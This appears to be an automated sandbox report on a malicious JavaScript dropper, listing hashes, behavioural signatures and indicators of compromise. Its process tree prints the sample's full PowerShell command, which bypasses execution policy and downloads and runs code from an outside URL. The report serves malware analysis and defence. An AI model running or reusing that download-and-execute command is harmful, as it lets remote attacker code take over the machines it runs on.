Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
23/01/2024, 12:38
Static task
static1
Behavioral task
behavioral1
Sample
in_5505503550550.js
Resource
win7-20231215-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
in_5505503550550.js
Resource
win10v2004-20231215-en
11 signatures
150 seconds
General
-
Target
in_5505503550550.js
-
Size
25KB
-
MD5
a1b9dd447c4d6f9183c5bf87947e25a9
-
SHA1
4f432cbe8e8af24ad387d6610ac9faf77c9a546d
-
SHA256
105c853779f94467b02eaa90a34a8f72443cab1548904132f2e7e552d02319bc
-
SHA512
0471387eab700330007f078989cd2ac9f2e5733a49141c19cf6331b3d5baa41e5fbace94d88fc31f2519ff94df622fbf31c80fb854310777e288d35cc0674d78
-
SSDEEP
768:WK8dfrxV8cShXNCEfcrUUe/7kS831swOD4Wz/D3ntccJn/XjCfUnwYOYoE1NbKfD:ymwMTnZc3HH
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://hsdiagnostico.com/readme.php
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2716 powershell.exe 6 2716 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2716 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2716 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2052 wrote to memory of 2716 2052 wscript.exe 28 PID 2052 wrote to memory of 2716 2052 wscript.exe 28 PID 2052 wrote to memory of 2716 2052 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\in_5505503550550.js1⤵
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://hsdiagnostico.com/readme.php')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-